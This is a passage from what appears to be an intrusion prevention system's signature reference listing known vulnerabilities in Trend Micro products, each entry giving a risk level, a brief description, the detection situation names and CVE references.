File-Text_Trend-Micro-Control-Manager-Cross-Site-Request-Forgery
Back to top

Trend-Micro-Control-Manager-DLP_policy.php-Directory-Traversal

About this vulnerability: A vulnerability in Trend Micro Control Manager
Risk: High
First detected in: sgpkg-ips-859-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro Control Manager
Type: Input Validation
Description: There exists a directory traversal vulnerability in Trend Micro Control Manager. A remote, unauthenticated attacker can use this to execute code on the affected system.
Situation: HTTP_CRL-Trend-Micro-Control-Manager-DLP_policy.php-Directory-Traversal
Back to top

Trend-Micro-Control-Manager-Download.php-Information-Disclosure

About this vulnerability: A vulnerability in Trend Micro Control Manager
Risk: High
First detected in: sgpkg-ips-857-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro Control Manager
Type: Malfunction
Description: There exists an information disclosure vulnerability in Trend Micro Control Manager. A remote, unauthenticated attacker can use this to read arbitrary files on the target server.
Situation: HTTP_CSU-Trend-Micro-Control-Manager-Download.php-Information-Disclosure
Back to top

Trend-Micro-Control-Manager-Lang-Parameter-Arbitrary-File-Inclusion

About this vulnerability: A vulnerability in Trend Micro Control Manager
Risk: Moderate
First detected in: sgpkg-ips-864-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro Control Manager
Type: Directory Traversal
Description: Improper sanitization of HTTP requests causes an arbitrary file inclusion vulnerability in Trend Micro Control Manager. A successful exploit allows an attacker to import and run their own code with the privileges of the server process.
Situation: HTTP_CRL-Trend-Micro-Control-Manager-Lang-Parameter-Arbitrary-File-Inclusion
Back to top

Trend-Micro-Control-Manager-Producttree-XML-External-Entity-Processing

About this vulnerability: A vulnerability in Trend Micro Control Manager
Risk: Moderate
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro Control Manager
Type: Input Validation
Description: An XML external entity (XXE) processing vulnerability has been reported in Trend Micro Control Manager. The vulnerability is due to lack of validation of user-supplied input prior to executing an XML query in ProductTree_RightWindow.aspx. A remote, authenticated attacker could exploit this vulnerability by sending a malicious HTTP request to the target system. Successful exploitation could allow the attacker to read arbitrary files from the target system.
Situation: HTTP_CS-Trend-Micro-Control-Manager-Producttree_Rightwindow-XML-External-Entity-Processing
Back to top

Trend-Micro-Control-Manager-Scloudservice-Getpassword-SQL-Injection

About this vulnerability: A vulnerability in Trend Micro Control Manager
Risk: Moderate
First detected in: sgpkg-ips-1077-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro Control Manager
Type: Input Validation
Description: There has been reported an SQL injection vulnerability in the Trend Micro Control Manager. A remote unauthenticated attacker could exploit this vulnerability by sending maliciously crafted requests to the target server. Successful exploitation could lead to arbitrary code execution.
Situation: HTTP_CRL-Trend-Micro-Control-Manager-Scloudservice-Getpassword-SQL-Injection
References:
CVE-2018-3604
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3604
Back to top

Trend-Micro-Control-Manager-Task_Controller-Information-Disclosure

About this vulnerability: A vulnerability in Trend Micro Control Manager
Risk: Moderate
First detected in: sgpkg-ips-791-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro Control Manager
Type: Input Validation
Description: Insufficient validation of URI parameters when handling requests results in an information disclosure vulnerability in Trend Micro Control Manager. A successful exploitation allows an attacker to access arbitrary files on the target system.
Situation: HTTP_CRL-Trend-Micro-Control-Manager-Task_Controller-Information-Disclosure
Back to top

Trend-Micro-Control-Manager-Threatdistributedtrail-Threatname-SQL-Injection

About this vulnerability: A vulnerability in Trend Micro Control Manager
Risk: Moderate
First detected in: sgpkg-ips-1081-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro Control Manager
Type: Input Validation
Description: Improper validation of user-supplied input for the ThreatName HTTP parameter in requests to the ThreatDistributedTrail resource causes an SQL injection vulnerability in Trend Micro Control Manager. A successful exploit may allow an attacker to execute arbitrary code with the privileges of the service.
Situation: HTTP_CSU-Trend-Micro-Control-Manager-Threatdistributedtrail-Threatname-SQL-Injection
References:
CVE-2018-3606
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3606
Back to top

Trend-Micro-Control-Manager-Treeusercontrol-Information-Disclosure

About this vulnerability: A vulnerability in Trend Micro Control Manager
Risk: Moderate
First detected in: sgpkg-ips-798-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro Control Manager
Type: Input Validation
Description: Improper validation of XML results in a vulnerability in Trend Micro Control Manager. A successful exploitation allows arbitrary files on the target system to be read.
Situation: HTTP_CS-Trend-Micro-Control-Manager-Treeusercontrol_Process_Tree_Event-Information-Disclosure
Back to top

Trend-Micro-Control-Manager-Widget-Importfile.php-Directory-Traversal

About this vulnerability: A vulnerability in Trend Micro Control Manager
Risk: High
First detected in: sgpkg-ips-859-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro Control Manager
Type: Input Validation
Description: There exists a directory traversal vulnerability in Trend Micro Control Manager. A remote, unauthenticated attacker can use this to execute arbitrary code on the affected system.
Situation: HTTP_CRL-Trend-Micro-Control-Manager-Widget-Importfile.php-Directory-Traversal
Back to top

Trend-Micro-Endpoint-Application-Control-Filedrop-Directory-Traversal

About this vulnerability: A vulnerability in Trend Micro Endpoint Application Control
Risk: Moderate
First detected in: sgpkg-ips-1071-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro Endpoint Application Control
Type: Directory Traversal
Description: There has been reported a directory traversal vulnerability in Trend Micro Endpoint Application Control. A remote attacker could exploit this by sending a maliciously crafted HTTP request to the target server. Successful exploitation could result in the arbitrary code execution.
Situation: HTTP_CSH-Trend-Micro-Endpoint-Application-Control-Filedrop-Directory-Traversal
References:
CVE-2018-10357
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10357
Back to top

Trend-Micro-Imsva-Management-Portal-Authentication-Bypass

About this vulnerability: A vulnerability in Trend Micro InterScan Messaging Security (Virtual Appliance)
Risk: Moderate
First detected in: sgpkg-ips-1045-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro InterScan Messaging Security (Virtual Appliance)
Type: Malfunction
Description: There has been reported a authentication bypass in Trend Micro InterScan Mail Security Virtual Appliance. Successful exploitation could allow the attacker to access the target server without credentials.
Situation: HTTP_CSU-Trend-Micro-Imsva-Management-Portal-Authentication-Bypass
References:
CVE-2018-3609
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3609
Back to top

Trend-Micro-Internet-Security-Pro-2010-ActiveX-ExtSetOwner

About this vulnerability: A vulnerability in Trend Micro Internet Security Pro
Risk: High
First detected in: sgpkg-ips-373-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Trend Micro Internet Security Pro
Type: Malfunction
Description: There is a code execution vulnerability in Trend Micro Internet Security Pro 2010 ActiveX control. The vulnerability is due to an error while parsing a parameter to the extSetOwner function. By specifying a specially crafted address, the process can call into a controlled memory region. An attacker can exploit this vulnerability by enticing a user to visit a maliciously crafted web site. This can result in code execution under the privileges of the current user.
Situation: HTTP_SS-Trend-Micro-Internet-Security-Pro-2010-ActiveX-ExtSetOwner
File-Text_Trend-Micro-Internet-Security-Pro-2010-ActiveX-ExtSetOwner
References:
CVE-2010-3189
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3189
OSVDB-67561
http://www.osvdb.org/67561
Back to top

Trend-Micro-InterScan-Messaging-Policywsaction-External-Entity-Injection

About this vulnerability: A vulnerability in Trend Micro InterScan Messaging Virtual Appliance
Risk: Moderate
First detected in: sgpkg-ips-1313-5242
Last changed: sgpkg-ips-1313-5242
Platform: Generic
Software: Trend Micro InterScan Messaging Security (Virtual Appliance)
Type: Input Validation
Description: An XXE vulnerability exists in Trend Micro InterScan Messaging Security Suite. The vulnerability is due to insufficient validation of XML data in the Java class PolicyWSAction. A remote, authenticated attacker could exploit this vulnerability by sending malicious XML data in the HTTP requests to the target server. Successful exploitation could result in the disclosure of file contents on the target machine.
Situation: HTTP_CRL-Trend-Micro-InterScan-Messaging-Policywsaction-External-Entity-Injection
References:
CVE-2020-27017
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27017
Back to top

Trend-Micro-InterScan-Messaging-Security-Modtmcss-Command-Injection

About this vulnerability: A vulnerability in Trend Micro InterScan Messaging Security (Virtual Appliance)
Risk: Moderate
First detected in: sgpkg-ips-1010-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro InterScan Messaging Security (Virtual Appliance)
Type: Input Validation
Description: Improper validation of HTTP request parameters causes a command injection vulnerability in Trend Micro InterScan Messaging Security. A successful exploit allows an attacker to run arbitrary code on the target system with the privileges of the server process.
Situation: HTTP_CRL-Trend-Micro-InterScan-Messaging-Security-Modtmcss-Command-Injection
References:
CVE-2017-11391
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11391
Back to top

Trend-Micro-InterScan-Messaging-Security-Remote-Code-Execution

About this vulnerability: A Trend Micro InterScan Messaging Security Remote Code Execution vulnerability
Risk: High
First detected in: sgpkg-ips-1016-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Linux
Software: Trend Micro InterScan Messaging Security (Virtual Appliance)
Type: Input Validation
Description: A vulnerability in Trend Micro InterScan Messaging Security (VirtualAppliance) which allows remote attackers to inject arbitrary commands due to improper sanitization of user inputs to the saveCert.imss endpoint.
Situation: HTTP_CRL-Trend-Micro-InterScan-Messaging-Security-Remote-Code-Execution
References:
CVE-2017-6398
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6398
BID-96859
http://www.securityfocus.com/bid/96859
Back to top

Trend-Micro-InterScan-Messaging-Widget-Information-Disclosure

About this vulnerability: A vulnerability in Trend Micro InterScan Messaging Security (Virtual Appliance)
Risk: Moderate
First detected in: sgpkg-ips-1311-5242
Last changed: sgpkg-ips-1311-5242
Platform: Generic
Software: Trend Micro InterScan Messaging Security (Virtual Appliance)
Type: Malfunction
Description: Improper access controls in Trend Micro Insterscan cause an information disclosure vulnerability that can be exploited to gain access to information which can be of use in further exploitation.
Situation: HTTP_CSU-Trend-Micro-InterScan-Messaging-Widget-Information-Disclosure
References:
CVE-2020-27019
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27019
Back to top

Trend-Micro-InterScan-Web-Security-Decryptpasswd-Buffer-Overflow

About this vulnerability: A vulnerability in Trend Micro InterScan Web Security Virtual Appliance
Risk: Moderate
First detected in: sgpkg-ips-1313-5242
Last changed: sgpkg-ips-1313-5242
Platform: Generic
Software: Trend Micro InterScan Web Security Virtual Appliance
Type: Buffer Overflow
Description: Improper validation of the length of user-supplied data in HTTP requests causes a buffer overflow vulnerability in Trend Micro InterScan Web Security. A successful exploit may allow an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Trend-Micro-InterScan-Web-Security-Virtual-Appliance-Decryptpasswd-Buffer-Overflow
References:
CVE-2020-28578
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28578
Back to top

Trend-Micro-InterScan-Web-Security-Virtual-Appliance-Password-Command-Injection

About this vulnerability: A vulnerability in Trend Micro InterScan Web Security Virtual Appliance
Risk: High
First detected in: sgpkg-ips-1320-5242
Last changed: sgpkg-ips-1320-5242
Platform: Generic
Software: Trend Micro InterScan Web Security Virtual Appliance
Type: Input Validation
Description: A command injection vulnerability has been reported in Trend Micro InterScan Web Security Virtual Appliance. The vulnerability is due to improper validation of user-supplied data in HTTP requests. A remote, unauthenticated attacker can exploit the vulnerabilities by sending a malicious request to the target server. Successful exploitation of these vulnerabilities could allow arbitrary command execution on the target server in the security context of iscan account.
Situation: HTTP_CRL-Trend-Micro-InterScan-Web-Security-Virtual-Appliance-Password-Command-Injection
References:
CVE-2020-8466
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8466
Back to top

Trend-Micro-Iwsva-Deploymentwizardaction-Getclusterinfo-Command-Injection

About this vulnerability: A vulnerability in Trend Micro InterScan Web Security Virtual Appliance
Risk: Moderate
First detected in: sgpkg-ips-941-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro InterScan Web Security Virtual Appliance
Type: Input Validation
Description: Improper validation of requests to the Getclusterinfo servlet causes a command injection vulnerability in Trend Micro InterScan Web Security Virtual Appliance. A successful exploitation allows an attacker to run arbitrary commands on the target system.
Situation: HTTP_CRL-Trend-Micro-Iwsva-Deploymentwizardaction-Getclusterinfo-Command-Injection
Back to top

Trend-Micro-Iwsva-Domains-Command-Injection

About this vulnerability: A vulnerability in Trend Micro InterScan Web Security Virtual Appliance
Risk: High
First detected in: sgpkg-ips-771-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro InterScan Web Security Virtual Appliance
Type: Input Validation
Description: There exists a command injection vulnerability in Trend Micro InterScan Web Security Virtual Appliance (IWSVA). A remote attacker could use this to execute arbitrary code on the affected system.
Situation: HTTP_CRL-Trend-Micro-Iwsva-Domains-Command-Injection
Back to top

Trend-Micro-Iwsva-HttpServlet-Command-Injection

About this vulnerability: A Trend Micro Iwsva HttpServlet Command Injection vulnerability
Risk: High
First detected in: sgpkg-ips-932-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro InterScan Web Security Virtual Appliance
Type: Input Validation
Description: A remote code execution vulnerability in Trend Micro IWSVA, 6.5 prior to 6.5 SP2 HF 1755, which allows remote attackers to execute remote commands via the netid, netmask, router, and interface_vlanid_sel parameters, due to incorrect input validation.
Situation: HTTP_CRL-Trend-Micro-Iwsva-HttpServlet-Command-Injection
Back to top

Trend-Micro-Iwsva-Logsettinghandler-Dopostmountdevice-Command-Injection

About this vulnerability: A vulnerability in Trend Micro InterScan Web Security Virtual Appliance
Risk: Moderate
First detected in: sgpkg-ips-870-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro InterScan Web Security Virtual Appliance
Type: Input Validation
Description: Improper validation of request parameters causes a command injection vulnerability in Trend Micro InterScan Web Security Virtual Appliance. A successful exploitation can allow an attacker to run arbitrary code on the target system.
Situation: File-Text_Trend-Micro-Iwsva-Logsettinghandler-Dopostmountdevice-Command-Injection
Back to top

Trend-Micro-Iwsva-Mailnotification-Buffer-Overflow

About this vulnerability: A vulnerability in Trend Micro InterScan Web Security Virtual Appliance
Risk: High
First detected in: sgpkg-ips-1314-5242
Last changed: sgpkg-ips-1314-5242
Platform: Generic
Software: Trend Micro InterScan Web Security Virtual Appliance
Type: Buffer Overflow
Description: A stack buffer overflow has been reported in Trend Micro InterScan Web Security Virtual Appliance. The vulnerability is due to improper validation of the length of user-supplied data in HTTP requests. A remote, authenticated attacker can exploit the vulnerability by sending a malicious request to the target server. Successful exploitation of this vulnerability could allow arbitrary code execution on the target server in the security context of iscan account.
Situation: HTTP_CRL-Trend-Micro-Iwsva-Mailnotification-Buffer-Overflow
References:
CVE-2020-28579
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28579
Back to top

Trend-Micro-Iwsva-Managepatches-Filename-Command-Injection

About this vulnerability: A vulnerability in Trend Micro InterScan Web Security Virtual Appliance
Risk: Moderate
First detected in: sgpkg-ips-769-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro InterScan Web Security Virtual Appliance
Type: Input Validation
Description: Improper validation of request parameters cause a command injection vulnerability in the Trend Micro InterScan Web Security Virtual Appliance. A successful exploitation allows an attacker to run commands as root.
Situation: HTTP_CS-Trend-Micro-Iwsva-Managepatches-Filename-Command-Injection
Back to top

Trend-Micro-Iwsva-Managevlansettings-Command-Injections

About this vulnerability: A vulnerability in Trend Micro InterScan Web Security Virtual Appliance
Risk: High
First detected in: sgpkg-ips-1318-5242
Last changed: sgpkg-ips-1318-5242
Platform: Generic
Software: Trend Micro InterScan Web Security Virtual Appliance
Type: Input Validation
Description: Two command injection vulnerabilities have been reported in Trend Micro InterScan Web Security Virtual Appliance. The vulnerabilities are due to improper validation of user-supplied data in HTTP requests. A remote, authenticated attacker can exploit the vulnerabilities by sending a malicious request to the target server. Successful exploitation of these vulnerabilities could allow arbitrary command execution on the target server in the security context of iscan account.
Situation: HTTP_CRL-Trend-Micro-Iwsva-Managevlansettings-Command-Injections
References:
CVE-2020-28581
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28581
Back to top

Trend-Micro-Iwsva-Pacfilemanagement-Delete_Pac_Files-Command-Injection

About this vulnerability: A vulnerability in Trend Micro InterScan Web Security Virtual Appliance
Risk: Moderate
First detected in: sgpkg-ips-913-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro InterScan Web Security Virtual Appliance
Type: Input Validation
Description: Improper validation of requests to the PacFileManagement servlet causes a command injection vulnerability in Trend Micro InterScan Web Security Virtual Appliance. A successful exploitation allows an attacker to run arbitrary commands on the target system.
Situation: HTTP_CRL-Trend-Micro-Iwsva-Pacfilemanagement-Delete_Pac_Files-Command-Injection
Back to top

Trend-Micro-Iwsva-Reporthandler-Docmd-Command-Injection

About this vulnerability: A vulnerability in Trend Micro InterScan Web Security Virtual Appliance
Risk: High
First detected in: sgpkg-ips-919-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro InterScan Web Security Virtual Appliance
Type: Malfunction
Description: There exists a command injection vulnerability in Trend Micro InterScan Web Security Virtual Appliance (IWSVA).
Situation: HTTP_CSU-Trend-Micro-Iwsva-Reporthandler-Docmd-Command-Injection
Back to top

Trend-Micro-Iwsva-TestConfiguration-Command-Injection

About this vulnerability: A vulnerability in Trend Micro InterScan Web Security Virtual Appliance
Risk: High
First detected in: sgpkg-ips-769-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro InterScan Web Security Virtual Appliance
Type: Input Validation
Description: There exists a command injection vulnerability in Trend Micro InterScan Web Security Virtual Appliance.
Situation: HTTP_CRL-Trend-Micro-Iwsva-TestConfiguration-Command-Injection
Back to top

Trend-Micro-Iwsva-VerboseLog-Directory-Traversal

About this vulnerability: A Trend Micro Iwsva VerboseLog Directory Traversal vulnerability
Risk: Moderate
First detected in: sgpkg-ips-933-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro InterScan Web Security Virtual Appliance
Type: Input Validation
Description: A directory traversal vulnerability in Trend Micro IWSVA, 6.5 prior to 6.5 CP 1746, which allows remote attackers access to sensitive information by sending a crafted HTTP request, due to incorrect input validation.
Situation: HTTP_CRL-Trend-Micro-Iwsva-VerboseLog-Directory-Traversal
Back to top

Trend-Micro-Iwsva-WMI_Domain_Controllers-Command-Injection

About this vulnerability: A vulnerability in Trend Micro InterScan Web Security Virtual Appliance
Risk: Moderate
First detected in: sgpkg-ips-770-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro InterScan Web Security Virtual Appliance
Type: Input Validation
Description: Improper validation of request parameters cause a command injection vulnerability in the Trend Micro InterScan Web Security Virtual Appliance. A successful exploitation allows an attacker to run commands as root.
Situation: HTTP_CS-Trend-Micro-Iwsva-WMI_Domain_Controllers-Command-Injection
Back to top

Trend-Micro-Mobile-Security-Enterprise-Client_Info-Slink_Id-SQL-Injection

About this vulnerability: A vulnerability in Trend Micro Mobile Security (Enterprise)
Risk: Moderate
First detected in: sgpkg-ips-998-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro Mobile Security
Type: Input Validation
Description: Insufficient validation of the slink_id request parameter with eas_agent_sync_client_info action causes an SQL injection vulnerability in Trend Micro Mobile Security. A successful exploit may allow arbitrary code execution on the target system.
Situation: HTTP_CS-Trend-Micro-Mobile-Security-Enterprise-Eas_Agent_Sync_Client_Info-Slink_Id-SQL-Injection
HTTP_CSU-Trend-Micro-Mobile-Security-Enterprise-Eas_Agent_Sync_Client_Info-Slink_Id-SQL-Injection
File-Text_Trend-Micro-Mobile-Security-Enterprise-Eas_Agent_Sync_Client_Info-Slink_Id-SQL-Injection
References:
CVE-2017-14078
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14078
Back to top

Trend-Micro-Mobile-Security-Enterprise-Eas_Agent-Slink_Id-SQL-Injection

About this vulnerability: A vulnerability in Trend Micro Mobile Security (Enterprise)
Risk: Moderate
First detected in: sgpkg-ips-993-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro Mobile Security
Type: Input Validation
Description: Improper parsing of requests causes an SQL injection vulnerability in Trend Micro Mobile Security. A successful exploit may allow remote code execution with system privileges without authentication.
Situation: HTTP_CRL-Trend-Micro-Mobile-Security-Enterprise-Eas_Agent_Unregister-Slink_Id-SQL-Injection
HTTPS_CS-Trend-Micro-Mobile-Security-Enterprise-Eas_Agent_Unregister-Slink_Id-SQL-Injection
File-Text_Trend-Micro-Mobile-Security-Enterprise-Eas_Agent_Unregister-Slink_Id-SQL-Injection
References:
CVE-2017-14078
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14078
Back to top

Trend-Micro-Mobile-Security-Enterprise-Get_dep_Profile-Id-SQL-Injection

About this vulnerability: A vulnerability in Trend Micro Mobile Security (Enterprise)
Risk: Moderate
First detected in: sgpkg-ips-1036-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro Mobile Security
Type: Input Validation
Description: There has been reported an SQL injection vulnerability in Trend Micro Mobile Security Enterprise. The value of id request parameter isn't properly validated to prevent SQL injections. Successful exploitation may allow remote code execution with system privileges without authentication.
Situation: HTTP_CRL-Trend-Micro-Mobile-Security-Enterprise-Get_dep_Profile-Id-SQL-Injection
HTTPS_CS-Trend-Micro-Mobile-Security-Enterprise-Get_dep_Profile-Id-SQL-Injection
References:
CVE-2017-14078
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14078
Back to top

Trend-Micro-Mobile-Security-Web_Service-Path-Traversal

About this vulnerability: A vulnerability in Trend Micro Mobile Security (Enterprise)
Risk: Moderate
First detected in: sgpkg-ips-1608-5242
Last changed: sgpkg-ips-1608-5242
Platform: Generic
Software: Trend Micro Mobile Security (Enterprise); Trend Micro Mobile Security (Enterprise)
Type: Directory Traversal
Description: Insufficient validation of the user-supplied data sent to the web_service.dll controller causes a file deletion / path traversal vulnerability in Trend Micro Mobile Security. A successful exploit allows an attacker to delete arbitrary files on the target system.
Situation: HTTP_CRL-Trend-Micro-Mobile-Security-Web_Service-Path-Traversal
References:
CVE-2023-32521
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32521
Back to top

Trend-Micro-OfficeScan-Console-Authentication-Buffer-Overflow

About this vulnerability: A vulnerability in Trend Micro OfficeScan Corporate Edition
Risk: Moderate
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro OfficeScan Corporate Edition
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the way Trend Micro OfficeScan management console handles HTTP requests. The vulnerability is due to lack of boundary protection while processing HTTP cookie strings. Remote unauthenticated attackers can exploit this vulnerability to take complete control of an affected system. In an attack case where code injection is not successful, the affected application will suspend abnormally. The attacker might consume all the system resource by sending continuous requests and create a denial-of-service condition to the affected server. In a more sophisticated attack where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected service.
Situation: Generic_CS-Trend-Micro-OfficeScan-Console-Authentication-Buffer-Overflow
TLS_CS-Trend-Micro-OfficeScan-Console-Authentication-Buffer-Overflow
References:
CVE-2007-3454
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3454
BID-24641
http://www.securityfocus.com/bid/24641
OSVDB-36629
http://www.osvdb.org/36629
Back to top

Trend-Micro-OfficeScan-Corporate-Edition-Buffer-Overflow

About this vulnerability: Trend Micro OfficeScan Corporate Edition Stack Based Buffer Overflow
Risk: High
First detected in: sgpkg-ips-648-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Trend Micro OfficeScan Corporate Edition
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in Trend Micro OfficeScan Corporate Edition, 8.0 Patch 2 build 1189 and earlier and 7.3 Patch 3 build 1314 and earlier, which allows attackers to remotly execute arbitrary code or cause a denial of service via a long encrypted password.
Situation: File-Text_Trend-Micro-OfficeScan-Corporate-Edition-Buffer-Overflow
References:
CVE-2008-1365
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1365
BID-28020
http://www.securityfocus.com/bid/28020
OSVDB-42499
http://www.osvdb.org/42499
Back to top

Trend-Micro-OfficeScan-objRemoveCtrl-ActiveX-Control-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the Trend Micro OfficeScan objRemoveCtrl ActiveX control
Risk: High
First detected in: sgpkg-ips-161-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Trend Micro OfficeScan Corporate Edition
Type: Buffer Overflow
Description: Trend Micro OfficeScan has a stack-based buffer overflow vulnerability. When a target user with a vulnerable version of the affected product visits a malicious web page containing an excessively long value assigned to one or more properties of the ObjRemoveCtrl object, code execution with the privileges of the currently logged in user may occur.
Situation: HTTP_SS-Trend-Micro-OfficeScan-objRemoveCtrl-ActiveX-Control-Buffer-Overflow
File-Text_Trend-Micro-OfficeScan-objRemoveCtrl-ActiveX-Control-Buffer-Overflow
References:
CVE-2008-3364
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3364
BID-30407
http://www.securityfocus.com/bid/30407
OSVDB-47213
http://www.osvdb.org/47213
Back to top

Trend-Micro-OfficeScan-Proxy.php-Command-Injection

About this vulnerability: A vulnerability in Trend Micro OfficeScan
Risk: Moderate
First detected in: sgpkg-ips-970-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro OfficeScan
Type: Input Validation
Description: Improper handling of HTTP parameter contents causes a command injection vulnerability in Trend Micro OfficeScan. A successful exploit allows arbitrary commands to be executed by a remote attacker without authentication with the privileges of the server process.
Situation: HTTP_CRL-Trend-Micro-OfficeScan-Proxy.php-Command-Injection
References:
CVE-2017-11394
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11394
Back to top

Trend-Micro-OfficeScan-Server-cgiRecvFile-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Trend Micro's OfficeScan
Risk: High
First detected in: sgpkg-ips-172-2032
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Trend Micro OfficeScan Corporate Edition; Trend Micro Client Server Messaging Security for SMB
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Trend Micro's OfficeScan. A remote attacker can send a crafted HTTP request message to the Trend OfficeScan server to execute arbitrary code with the privileges of the affected service, normally System.
Situation: HTTP_CRL-Trend-Micro-OfficeScan-Server-cgiRecvFile-Buffer-Overflow
References:
CVE-2008-2437
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2437
BID-31139
http://www.securityfocus.com/bid/31139
Back to top

Trend-Micro-OfficeScan-Zip-Directory-Traversal-CVE-2019-18187

About this vulnerability: A vulnerability in Trend Micro OfficeScan
Risk: Moderate
First detected in: sgpkg-ips-1210-5242
Last changed: sgpkg-ips-1858-5242
Platform: Generic
Software: Trend Micro OfficeScan
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in Trend Micro's OfficeScan. The vulnerability is due to insufficient handling of directory traversal characters in uploaded ZIP archives. A remote, authenticated attacker could exploit this vulnerability by sending a request containing a crafted ZIP file to the OfficeScan server. Successful exploitation could result in arbitrary code execution in the context of the server application.
Situation: HTTP_CS-Trend-Micro-OfficeScan-Zip-Directory-Traversal-CVE-2019-18187
File-Zip_Trend-Micro-OfficeScan-Zip-Directory-Traversal-CVE-2019-18187
References:
CVE-2019-18187
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18187
Back to top

Trend-Micro-Safesync-Enterprise-Storage-Discovery_iSCSI_Device-Command-Injection

About this vulnerability: A vulnerability in Trend Micro SafeSync for Enterprise
Risk: Moderate
First detected in: sgpkg-ips-864-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro SafeSync for Enterprise
Type: Input Validation
Description: Incorrect validation of request parameters in Trend Micro's SafeSync for Enterprise storage.pm page causes a command injection vulnerability. A successful exploit allows an attacker to run arbitrary code with root privileges.
Situation: HTTP_CRL-Trend-Micro-Safesync-For-Enterprise-Storage-Discovery_iSCSI_Device-Command-Injection
Back to top

Trend-Micro-Safesync-For-Enterprise-Ad.pm-Id-Remote-Command-Execution

About this vulnerability: A vulnerability in Trend Micro SafeSync for Enterprise
Risk: High
First detected in: sgpkg-ips-809-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro SafeSync for Enterprise
Type: Input Validation
Description: There exists a remote command execution vulnerability in Trend Micro SafeSync for Enterprise ad.pm page.
Situation: HTTPS_SS-Trend-Micro-Safesync-For-Enterprise-Ad.pm-Id-Remote-Command-Execution
File-Text_Trend-Micro-Safesync-For-Enterprise-Ad.pm-Id-Remote-Command-Execution
Back to top

Trend-Micro-Safesync-For-Enterprise-Check_NFS_Server_Status-Command-Injection

About this vulnerability: A vulnerability in Trend Micro SafeSync for Enterprise
Risk: Moderate
First detected in: sgpkg-ips-945-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Trend Micro SafeSync for Enterprise
Type: Input Validation
Description: Insufficient validation of user-supplied data causes a command injection vulnerability in Trend Micro's SafeSync for Enterprise. A successful attack allows arbitrary code to be run as root on the target system.
Situation: File-Text_Trend-Micro-Safesync-For-Enterprise-Check_NFS_Server_Status-Command-Injection
Back to top

